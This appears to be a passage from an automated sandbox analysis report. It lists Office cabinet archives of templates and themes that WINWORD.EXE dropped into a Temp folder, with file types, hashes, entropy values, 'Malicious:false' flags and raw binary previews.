                                                                                                                                                        Preview:MSCF....:.......D...........................:....?..................................PictureFrame.glox.................Content.inf........[.... '.q..@.........<./..+./. ...."o.o./..{^a.7^.D.HA....^J... ...........T%q..b...+pz.n.=....jT.+M..=H..A...py.3.........H...N...[..%..~....>.%....3.r...wx.....0.....7..94..2..45..7f.......D.. ...[...f.:H..../N..4.....8.....:x.I....u|.`."...\..N..%.M#..^v$.*....T.m.....?.-.wki.X..8..F.G..Y.^8...-....+.&.+&.No...e!.#.8.....YF.......<w.....=.Q.S..7....MW....M..9A.3..c..L....|.E-Y....]n".|....b9..l@.d.T...a.f...~.&k.[..yS..q..]L}..)w.....$.@..v...[9..X....V...a.NK....m9.5.....Kq.;9`.U.e...8.<..)Y.H........z.G...3n.yWa.g.>.w!e.B8:......f..h..z....o.1<.RT..WK...?g .N..+..p.B.|...1pR_......@...a....aA......ye..8...+M.l..(.d..f.;....g........8R.\.w.:ba....%...|p....`lrA.|....a.U.m=ld......7....#..?Dq..D.....(.5.K.a..c.G..7..]hF..%:}......}J.j$.....4...l];..v>.&j........Y.vk..$1.@X$...k...9..?...z..![..../...).a.=....aZ^.3?....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7DAE.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):21357
                                                                                                                                                        Entropy (8bit):7.641082043198371
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:zdx+NRrogu6fzCI7Th7G8E0GftpBjEzZq4FLrHRN7/Oll7PK/pB:/+NRrFf/G8Pi6zZb/GIB
                                                                                                                                                        MD5:97F5B7B7E9E1281999468A5C42CB12E7
                                                                                                                                                        SHA1:99481B2FA609D1D80A9016ADAA3D37E7707A2ED1
                                                                                                                                                        SHA-256:1CF5C2D0F6188FFFF117932C424CC55D1459E0852564C09D7779263ABD116118
                                                                                                                                                        SHA-512:ACE9718D724B51FE04B900CE1D2075C0C05C80243EA68D4731A63138F3A1287776E80BD67ECB14C323C69AA1796E9D8774A3611FE835BA3CA891270DE1E7FD1F
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF....].......D...........................]....?..........{.......................rings.glox.................Content.inf..|^.....[......P........<.$.."..0R..xa.Ax#B..d... ....K,.....^.H.....H.........&.j.\f.. ..,....,..!k..R..e..!...E...........................><.RB.....~h...........Q................g..M|,...x.....qV7.u..\...F-N.{-..X..&Zig.~..{.A.p.Z...X..{,-n............`$.%.ND.....>].6cvZ.%d..*a.$..-.K.Hf....L..;.#...H....U,........P.@.*-$C.,.g...%YJE..$.jP........b...Y<..[U...MF]F.K...1... x.}3w.o.#,.}T.....w5+...=.=...c.F^....OM.=.......G_{n.*...WC.w!......{/.~.}..s..6_......)..Xy...4.....<..XZJ........#~._i....%..fM.V.?.q...q.....7...B..sVt...(.:..c....~.e...kGZ...C..(J..o...`...?.)-.T.l....&...gR.$.....g.:...2.e%F.....x....z0...K..a8B...........D..]....7....~.".DR...r)...}b)e.>.\h~f...(}.c........Q...o5H.........C.KC.(.L.l................R..a.pg{..\.......-b........}.C......qTS..%..r.lG..Q.1..Z.>a.D...tC..LV...Rs.C.M18x.:......%O.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7E42.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):31471
                                                                                                                                                        Entropy (8bit):7.818389271364328
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:eNtFWk68dbr2QxbM971RqpzAA8Pi6TlHaGRA5yr:eNtEkpGSbuHAkP7TlHaGq54
                                                                                                                                                        MD5:91AADBEC4171CFA8292B618492F5EF34
                                                                                                                                                        SHA1:A47DEB62A21056376DD8F862E1300F1E7DC69D1D
                                                                                                                                                        SHA-256:7E1A90CDB2BA7F03ABCB4687F0931858BF57E13552E0E4E54EC69A27325011EA
                                                                                                                                                        SHA-512:1978280C699F7F739CD9F6A81F2B665643BD0BE42CE815D22528F0D57C5A646FC30AAE517D4A0A374EFB8BD3C53EB9B3D129660503A82BA065679BBBB39BD8D5
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF.....;......L............................;...?...................;......g...............sist02.xsl.................Content.inf....!....[...=.rF..3U.5...g.i?..w.oY..If'.......Y.;.B.....Wo.{T.TA.~......8......u.p....@Q..k.?.....G....j.|*.*J69H.2.ee..23s..;3..i..L.,...0se.%J........%.....!.....qB...SC...GAu5.P..u7....:.|.$Fo............{.......v.v.g..{o....e.....m.JeRG..,.%.1..Lh.@8.i.....l.#.HB`B....C......D@....?....P?..................|.9..q.......9.n.....F...s,....3..Q..N......y......_i..9|.<w...'q.Tq...U.E.B...q.?.4..O(_O.A.......*jC.~.21.7.....u.C...]uc.....-.g.{C~9q.q.1.1...4..=.0.Z.^....'../....-.6.K.....K...A#.GR..t.@.{.O.......Q5..=....X...^...F3.e.E.Z..b+R..?Z..0T1.....gQz.&....%y=zx.f.....6-*...u.Rm..x<...?...!g@.}..).J...:*...9.s&.v..}..'...\..Sd..F...........kQr.....h..3..1....B...B{M...%O.59.\.#....s/.pE.:}...k_.P.>.zj....5|.9+....$M..L........(...@#.....N.....N.*..........E..7..R$.:9!r>7.....v...>..S.w....9..]..n.w.;&.W..<r\S....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7E53.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):42788
                                                                                                                                                        Entropy (8bit):7.89307894056
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:Hx+UzBiwDQTXgBm029ClGn4BZz6i5kIew/jG8Pi6lYJz1gH:0ZXc29eGn2n5klwjxP7l2z1gH
                                                                                                                                                        MD5:21A4B7B71631C2CCDA5FBBA63751F0D2
                                                                                                                                                        SHA1:DE65DC641D188062EF9385CC573B070AAA8BDD28
                                                                                                                                                        SHA-256:AE0C5A2C8377DBA613C576B1FF73F01AE8EF4A3A4A10B078B5752FB712B3776C
                                                                                                                                                        SHA-512:075A9E95C6EC7E358EA8942CF55EFB72AC797DEE1F1FFCD27AD60472ED38A76048D356638EF6EAC22106F94AFEE9D543B502D5E80B964471FA7419D288867D5D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF.....h......L............................h...?..................@g......o...............Element design set.dotx.................Content.inf.Y/..Re..[......f........,..]....D.],....]..X.......XC4pE.....p........2..u;L.N.....]G..d.^d.$).e.=..;..Kb.../.../....H.."...w$._I..5.....a..4.Gd5p......v.8..1..%H..\..e...3.e..A..).d*.. . (.8.".......(>..<...@...~*v&.f..LWhqk]+Uep.d..%...o.....k.......e...nNN.&_.>.d.?H`"...r?..Z.p..q..<M.N.t....{*.y]#...._XW"qI...x.......}.. .N...;.}:..m8...[.r.F....^?...o...u..*...J3.V....~...~tn#.Kf6.s.|*..,s...M.$.f..?Yu.pE.1_wU...%....._..'..Z......y:.{.J5..7..Q.w}/.~.-3~Ctw=..IT.....mI.u@...y.M....2.%...y...Y..j.k<-.Q.r...7m..b...+.6..|.....U..}[...,....^....5..D..qW...[3).p.Y<.Hh..t...%cw=Z..W.~W.F....zr.4.g...O...P.g_^..3.-............3s...S..y...u...N...EsJz....tT../..c[w{cG....../6.....:.W<d5}.q..s..K"$........Ne..5..#.v'..n4.rj....Fc=....5..VN.....6..9`....|..........WX..-?..........W.)^`1.......].R2..s6...H.......

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7E63.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):43653
                                                                                                                                                        Entropy (8bit):7.899157106666598
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:+bjfeR1OOZvv439PlDe5/QzhgFSo0UEDmJwkqTA8Pi63Bsgn66w:IM3CN9ZzhFbUUwaP73BsB6w
                                                                                                                                                        MD5:DA3380458170E60CBEA72602FDD0D955
                                                                                                                                                        SHA1:1D059F8CFD69F193D363DA337C87136885018F0F
                                                                                                                                                        SHA-256:6F8FFB225F3B8C7ADE31A17A02F941FC534E4F7B5EE678B21CD9060282034701
                                                                                                                                                        SHA-512:17080110000C66DF2282FF4B8FD332467AF8CEFFA312C617E958FDFEBEE8EEA9E316201E8ABC8B30797BB6124A5CC7F649119A9C496316434B5AB23D2FBD5BB8
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF....uk......L...........................uk...?...................j......r...............Equations.dotx.................Content.inf.94v..R..[..... .............v........." Vw.w..r.....D.V5.p...W......b;....\x.....f.-...............l.....L.F..*..@..BnF.I.....%1..0....&.X.......X-.\.\.>..A....@..:...N .G./.Sp.A0.0.`.....q....b... ......S.{K...V....J............>\....\.E.#.,$.hxu.F.Fo....<...{..6../..#..l>d...w...&...S.....L.].....^..L......;~l.......qw.o. .....v.u.W`.4Z.A.....dC..Q)9.c..qgtfJ..G.(.J....q4V.).mK4;..zY..b.5&....V...0X.].Z..U.Lx..^..:8XQh.....7yy.._5............c.W...c...xY..%..G.$....kg^.1g.9.....z^.'...q."..K)a[.pW .LS.:Q8.....2..._q.os....y...d11.*.m....8.,.^.4_?i.e.u.,....._y.....zZZA.D.D<..+....{....Sfnv...t.....0...vV..y.r..3..%.<.t......;.h.wh.-.g.>..5...R...........y..]^..R..<...>$~.'...kk.n..H.EN.eQ.Q.O./='....)t.l0,/].....FNN......?...&..'.eS....K.K.v".^L..x=.^......1x|....=}@...B.kq;_a..C.q?..Y9.v......Q..u.G..V.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7E64.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):46413
                                                                                                                                                        Entropy (8bit):7.9071408623961394
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:WaxA0CH65GY3+fvCXCttfR8JEBrkquwDn+QV5V+vNWBatX/xG8Pi65sMuMjvU+mQ:hne65GYOfKXMSEBrBtDnzFAI4JxP75sM
                                                                                                                                                        MD5:C455C4BC4BEC9E0DA67C4D1E53E46D5A
                                                                                                                                                        SHA1:7674600C387114B0F98EC925BE74E811FB25C325
                                                                                                                                                        SHA-256:40E9AF9284FF07FDB75C33A11A794F5333712BAA4A6CF82FA529FBAF5AD0FED0
                                                                                                                                                        SHA-512:08166F6CB3F140E4820F86918F59295CAD8B4A17240C206DCBA8B46088110BDF4E4ADBAB9F6380315AD4590CA7C8ECDC9AFAC6BD1935B17AFB411F325FE81720
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF....=v......L...........................=v...?..................5u......................Text Sidebar (Annual Report Red and Black design).docx.v...............Content.inf..C,.zd..[............... .w.....b...wwww]r..W\ww...... .hh...........o.nz.....Ku.7..-.oH...h;.N..#.._.D,}......!Q$..Un.tI11..$w.r3... ..p...=.1....""..n...*/....h.A...Y..c,.Q.,......",..b.1.w..$.....l../;..J.....~.. ....+.R#....7.-..1.x.feH.@.......u...(.DQ%.wL.N|.xh...R..#....C...'X.m.....I{W.....5.C.....\....z.Y.)w..i...%....M..n.p.....{..-G9..k.bT.6........7....).....6..ys.....R.e.....0.Xk`.3..X\xL..4J"#.f...:....r..2..Y.uW..052.n.+ ..o..o..f&u.v.&9y.P..6.K..in.DU.#.~....4i..6;.5.w..i...g.(....../..0*Vh...C..//....W..:w......7.6....]....4.*9...sL.0k...zHh..2N.H...*..]..(.x.:..........Y.+...-.....&.*^..Q.sW...v..w.....k.L.e.^.W4iFS..u.....l.g'...b~:Zm...S.2.|......5S..=.............l.../|....G|.9 ..#.q...W.Q...G=.."W..'.6....I....D._.{.g.47....V.1._..<?....m............)..T.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab8010.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):222992
                                                                                                                                                        Entropy (8bit):7.994458910952451
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:6144:k8/c2cF9GTLqsTmYstUdx+dwb2ooiVOfiI17zWbQ:jbzqGdpbZ/Mf3h68
                                                                                                                                                        MD5:26BEAB9CCEAFE4FBF0B7C0362681A9D2
                                                                                                                                                        SHA1:F63DD970040CA9F6CFCF5793FF7D4F1F4A69C601
                                                                                                                                                        SHA-256:217EC1B6E00A24583B166026DEC480D447FB564CF3BCA81984684648C272F767
                                                                                                                                                        SHA-512:2BBEA62360E21E179014045EE95C7B330A086014F582439903F960375CA7E9C0CF5C0D5BB24E94279362965CA9D6A37E6AAA6A7C5969FC1970F6C50876582BE1
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF.....'......D...............]............'..H?..........z..................M{. .content.inf..l.........M{. .View.thmx......R..[...........@...G...I..(J.....B....Q!....}Ju..(BR..._|.5.%.....6m...........?.w{.rm,....#....;Ba#.:v...Dv.."u.v{!...f}......!......:.S.......".z.f.......==.n.0Km0eh.Kbm.C.r.6.........d..h.....{..w..}....2sb...rvm..x...0(..B... ...BH.r#.@..d".*..F+...Q.sx.....?...d.d.eZ2W2.2d...q.I....4.e4....#.....K...3...1.p.y......>.~V....cm....n^..b.{..._D?..AG...'...k.L&..h}=p.....Wl....(.......>.~.].....'.4.W{......../......7.....'.s...w...6..hn..e.2.).l]u.v4...GF.X..X..X....G.i.\..y.g&.<&ti......Sp,j.....>I..S..%.y..........S..-).+...>...D..............[...d...jt.~<x.a(.MDW..a..ZI.;+..!,.$...~>#...).R4...K.$.Zm......b...........{..._..A{.}..r...X...T.ZI.T.).J...$.".U,.9...r.z.)......}...()<....m....QS.p...;?..5.W~2r.EZu..P.1.%'l.........+/6.Mm.|2....Ty..f.o.S.....3J.._...X,..m....:..1.<GqFy.QA9W4.=....n...ZP...O.\.[...:8.%.^..H.....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab8030.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):271273
                                                                                                                                                        Entropy (8bit):7.995547668305345
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:6144:zfdvQnJMwXse4Vradf3mrC7woyWbjKlCVC7K:zfJwJse4VrS1AK
                                                                                                                                                        MD5:21437897C9B88AC2CB2BB2FEF922D191
                                                                                                                                                        SHA1:0CAD3D026AF2270013F67E43CB44F0568013162D
                                                                                                                                                        SHA-256:372572DCBAD590F64F5D18727757CBDF9366DDE90955C79A0FCC9F536DAB0384
                                                                                                                                                        SHA-512:A74DA3775C19A7AF4A689FA4D920E416AB9F40A8BDA82CCF651DDB3EACBC5E932A120ABF55F855474CEBED0B0082F45D091E211AAEA6460424BFD23C2A445CC7
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF....Q.......D...............y...........Q...XJ..........{..................M.. .content.inf.(..........M.. .Frame.thmx.1....b..[.........B.....6....ZZ}....BH..-D..}..V.V-........Z..O.....H.f..........;..@d.`......!..=;.,bp..K.q....s.y....D.qZ)p......D...r.S....s=B.4.).8B....4.a6 ...~........."....#.....}....n.Q.1cH.%c/.U....E..E...!..Da*.p....X..G..:.....1.@.....W.'...._........W.c...<.v.k.....&.8......?.h.>d._:-.X.......9..tL}........3.;.N3.D~......>.^?..|:...}......oT.z.......w..[..}:...._fu........Kk.......L..9..p..e..^......K.%...Mapqhvv..E&.^.....[...9|"l...9...U......!..w..Nya...~C.yx...w.K..q.z.j.W?t.......DY.x.S2.....]..na.Qj...X.K..^...S.hK.W...Z....s.0...NF...8C.......j.'Zc...k.%...l....S.....OW..o.Qf.x...X.;<.rO].....W.m.e....T.1.6........".....Q.3........l..v.."..I...&......w..4vE...c.s[.3.m..8.q$.....a...)...&:6..,..#..?....;.!.....~.UP.r=.}h.&U......X...]..X.e\u.G<....E....lG.@.*Z...10.D@.]....z+-.S....p..Y.PK.:.S..p.....1E`..-

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab8041.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):276650
                                                                                                                                                        Entropy (8bit):7.995561338730199
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:6144:H2a+HFkDF8gpmMt4kzwVVqhSYO6DITxPWgJl1CFExwXyo7N:mlZgFtIVVTuDExeWuv7N
                                                                                                                                                        MD5:84D8F3848E7424CBE3801F9570E05018
                                                                                                                                                        SHA1:71D7F2621DA8B295CE6885F8C7C81016D583C6B1
                                                                                                                                                        SHA-256:B4BC3CD34BD328AAF68289CC0ED4D5CF8167F1EE1D7BE20232ED4747FF96A80A
                                                                                                                                                        SHA-512:E27873BFD95E464CB58B3855F2DA404858B935530CF74C7F86FF8B3FC3086C2FAEA09FA479F0CA7B04D87595ED8C4D07D104426FF92DFB31BED405FA7A017DA8
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF............D................................D..........~..................M. .content.inf............M. .Dividend.thmx..).}.b..[.....`.........?.R...T../..............4..yy....{...f.h..\U......sy.gV0Q.@..A..@..3a.A}........7.q.......8......R....sJ)E..ENr.S*B.1..).s.r.J.D.b."..........(.....E$.V........y.5.L....;gY..QK/nni..x..3.<..Q.Q..K.I.....T.z.,F.....{.p.....;8._.&../...........X...}.;[Gk..._.i`m.u.?...s.w...4.....m......l....5..n.?..c..m...,.....{.k.?......sC.............e..1....oL.8./......1._.K:.]..&......O............qo.....Dd/c...6.q.*......V.v........h....L..h..C+..V..;O.(7Z]{I%....S3.{h....\...b.......5.ES......Z.4...o.c`..YA....9i....M.s....Z3.oq`....>.i..@.@n.a...x.3.zp.<....vU/.|^CvE...aD.P&mhvM>.p..B~....."._.......v-.m..w..?._..=...:...k....i.}x.6....Y.i..n....h...j......LZ.....fk..f0.y.T..Vl.;...s.......B6.f.'z.c.\W?...4U)..aJ.;O....L.d7.J.V#Q.....\J.F.?].d}!..y].6..%..~....|......5...'N.#.....t6.,.E.O."..0fyz....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab8051.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):295527
                                                                                                                                                        Entropy (8bit):7.996203550147553
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:6144:nwVaEqsf23c9shf6UyOGgDWDn/p3fd+zkPWnvGL3n9bQnkmVheyqtkl:MlPfW6sVEDn/pPdhWnvGL36zyyqal
                                                                                                                                                        MD5:9A07035EF802BF89F6ED254D0DB02AB0
                                                                                                                                                        SHA1:9A48C1962B5CF1EE37FEEC861A5B51CE11091E78
                                                                                                                                                        SHA-256:6CB03CEBAB2C28BF5318B13EEEE49FBED8DCEDAF771DE78126D1BFE9BD81C674
                                                                                                                                                        SHA-512:BE13D6D88C68FA16390B04130838D69CDB6169DC16AF0E198C905B22C25B345C541F8FCCD4690D88BE89383C19943B34EDC67793F5EB90A97CD6F6ECCB757F87
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF.....B......D...............P............B..p?..........{.................M.. .Basis.thmx...........M.. .content.inf.`g..td..[...............5..$..WM.....R.......H\.+\./^...x.^..h..MU..\........v........+......g...$.......g.....~....U].7..T..1k.H...1...c.P.rp.6K..&......,.............U4.WoG.w.....;.....v..922.;]..5_-]..%E]b..5]... (..H..II..ttA4Q..BI!|...H.7J.2D....R.......CXhi`n....6..G.~&.[..N...v..Z"t.a..K..3..).w...._@.}.}.v.......4......h....R;.8.c&.F...B^....Q.....!Bm2...F.`.......M;...#.{....c...?...e...6t..C.-.E.V.v%I..H.....m.n...$D.....vU'.....=6}~...Gw...Y..?.@......G.....k......z...5d.h......1.}..O*;e..t......Y.0...3.v).X.-.2.....~....14.[.w=I....hN....eD..7G.u.z..7.do..!....d..o.wQ.:....@/.^..<e.-..=\.....6.C.'.rW$..Cp.M3.u6z......Q.F.9.5....juc..I...m4]7L....+n......).t......2[.3.p.:.....O5y..wA........^..!..H....{..S.3w.!&.'.;...(..|m.x.S..Z.j..3...n..WU...../w.......xe=.+.D...x..qy.S.....E..... ...uu.`.,..<.6[p

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab8082.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):261258
                                                                                                                                                        Entropy (8bit):7.99541965268665
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:6144:9blShNYrHNn0JU+D+kh8CIjXHWC7X0nZLC9Ge2KY/WfI:9ZSTYrtn0Sk+CIDHWC7chVKYx
                                                                                                                                                        MD5:65828DC7BE8BA1CE61AD7142252ACC54
                                                                                                                                                        SHA1:538B186EAF960A076474A64F508B6C47B7699DD3
                                                                                                                                                        SHA-256:849E2E915AA61E2F831E54F337A745A5946467D539CCBD0214B4742F4E7E94FF
                                                                                                                                                        SHA-512:8C129F26F77B4E73BF02DE8F9A9F432BB7E632EE4ABAD560A331C2A12DA9EF5840D737BFC1CE24FDCBB7EF39F30F98A00DD17F42C51216F37D0D237145B8DE15
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF............D...............nJ...............D.................."..........M. .content.inf....."......M. .Metropolitan.thmx...cVtP..[.....`Q..B.....=.T.....h.."...Z..|..}hZK.V....Z..Z................?..v...[S$."...H......^u.%.@...>....... f.........1.5......*&lm.tZ.msz:...Noc....1....D .........b..... ..3#pVp....}oo]{m......H*[%i.GNHB1D<......(*# ....H"....DP..b(B.<.....v......_..`.7..;.}............/.p}.:vp....~l0..].........S....G?.....}..U.;......dNi..?........-c..J.z....Z...._.O.....C..o.,......z....F....sOs$..w9......2G..:@...'....=.....M..am.....S......(`.._....'......[..K"....BD...D...^1k.....xi...Gt....{k@.W.....AZ+(,...+..o......I.+.....D..b. T.:..{..v.....g..........L.H.`...uU~C.d...{...4.N.N..m8..v.7..3.`.....,...W...s.;.fo.8.Y...2.i...T&.-...v8..v.U.Y=...8..F.hk..E.PlI.t.8......A.R....+.]lOei..2...... gS*.......%8H.....<.U.D..s.....>.....D_...../....l.......5O1S~.........B.g.++cV.z.f .R.Z.......@6....(..t^5"...#G...

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab8084.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):307348
                                                                                                                                                        Entropy (8bit):7.946833019996754
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:7vH3uG+yiWx0eVJyORloyyDqnHefzOs81MrXLXx:b36yiWH/LRS2CJl1
                                                                                                                                                        MD5:D8061BC23061E573E56A363CDE295386
                                                                                                                                                        SHA1:C09441055BF4824354AB7913A39D3B5B1986350E
                                                                                                                                                        SHA-256:3CEC8CE1570795767AE8585F158D653021D0F7B3BEBE5B2A34B4D056BFD702E7
                                                                                                                                                        SHA-512:2554D45FE1A05C158D106130654D579AC4F118371DE554E6054DB93237261A488A5219227367A95928A1E435CFAB9DED0B464CD99BF9D4D1E57D7BFD5AC56228
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF....tq......D...........................tq.. ?..........|..................Mn. .Banded.thmx............Mn. .content.inf..;.u.i..[...............?....^.j.{j.B...$M/!...W....{!..^0x/.6...&............w......$.B..J.?a.$=...P..L...d..........+./.\..E:h.....-.$..u-.I..L\.M.r..Y..:rtX:....8...........+8.}{......&.-..f.f..s3-P.''.r...Z-"/E../...^%^N(,.$..$.H..O........q>...|.|......y..m.)u....`.....z.n..-.[.5....xL....M...O..3uCX..=4.....7.yh...dg.;..c.x.4..6..e..p.e"..,.!.St{..E..^I.9j....;..`.Y..#.0..f...G.....9~./....QCz.93..u%hz.........t9.""........)..7K.c~E!..x.E.p...[......o..O.j.c.......6.t{...".....t9V;xv....n<.F.S2.gI.#6...u..O..F.9.[.L.....K....#..zL..I...o....k...qog.......V..BKM..#.bET.)..&4..m.w...*....E.a[.Q.y.B...w...r.nd...)...<..#..r[4.y...#.z.....m?.2K.^...R{..m..f......r?]..>@...ra$...C+..l].9...."..rM9=......]".'...b&2e...y..a..4....ML..f...f"..l..&.Rv=2LL..4...3t_x...G....w..I.K....s.t.....).......{ur.y2...O3.K*f.*P(..F..-.y.Z...

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab8106.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):230916
                                                                                                                                                        Entropy (8bit):7.994759087207758
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:6144:OTIPtMXmJWnzPS3pqnkeuJXW+FNx1a72rLiQxEBTR:750nz63/FJRFLISnp+Bt
                                                                                                                                                        MD5:93FA9F779520AB2D22AC4EA864B7BB34
                                                                                                                                                        SHA1:D1E9F53A0E012A89978A3C9DED73FB1D380A9D8A
                                                                                                                                                        SHA-256:6A3801C1D4CF0C19A990282D93AC16007F6CACB645F0E0684EF2EDAC02647833
                                                                                                                                                        SHA-512:AA91B4565C88E5DA0CF294DC4A2C91EAEB6D81DCA96069DB032412E1946212A13C3580F5C0143DD28B33F4849D2C2DF2214CE1E20598D634E78663D20F03C4E6
                                                                                                                                                        Malicious:false
